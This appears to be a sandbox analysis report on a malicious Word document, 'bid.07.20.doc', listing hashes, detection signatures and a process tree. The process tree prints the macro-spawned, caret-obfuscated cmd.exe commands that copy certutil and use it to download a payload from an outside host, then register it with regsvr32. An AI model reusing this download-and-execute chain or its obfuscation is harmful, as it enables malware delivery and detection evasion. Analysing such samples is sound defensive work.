a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f

Analysis

max time kernel
60s
max time network
43s
platform
windows7_x64
resource
win7v200722
submitted
03-08-2020 20:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bid.07.20.doc
Size

110KB
MD5

df1c3c76ae77a9c9e14e642e211e1cdf
SHA1

012dcfc2876916eaf12c1356e5fe893c7d155c70
SHA256

a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f
SHA512

7bf330e64225a6294b3085fdc435478c5405f2c4379ceca4e285e319288091a7cd72ea688ff944414cbc62ef28240a9a05b4bb202fce1fe9959e7de1898ab1dd

Score

10^/10

discovery

Malware Config

Signatures

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes:

cmd.exe

pid process

840 cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1060 WINWORD.EXE

pid	process
840	cmd.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

WINWORD.EXE

pid	process
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	304	1060	cmd.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	840	1060	cmd.exe	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 1060 wrote to memory of 304	1060	WINWORD.EXE	cmd.exe
PID 1060 wrote to memory of 304	1060	WINWORD.EXE	cmd.exe
PID 1060 wrote to memory of 304	1060	WINWORD.EXE	cmd.exe
PID 1060 wrote to memory of 840	1060	WINWORD.EXE	cmd.exe
PID 1060 wrote to memory of 840	1060	WINWORD.EXE	cmd.exe
PID 1060 wrote to memory of 840	1060	WINWORD.EXE	cmd.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bid.07.20.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
  2⤵
  - Process spawned unexpected child process
  PID:304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Process spawned unexpected child process
  PID:840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/304-2-0x0000000000000000-mapping.dmp

Download
memory/840-3-0x0000000000000000-mapping.dmp

Download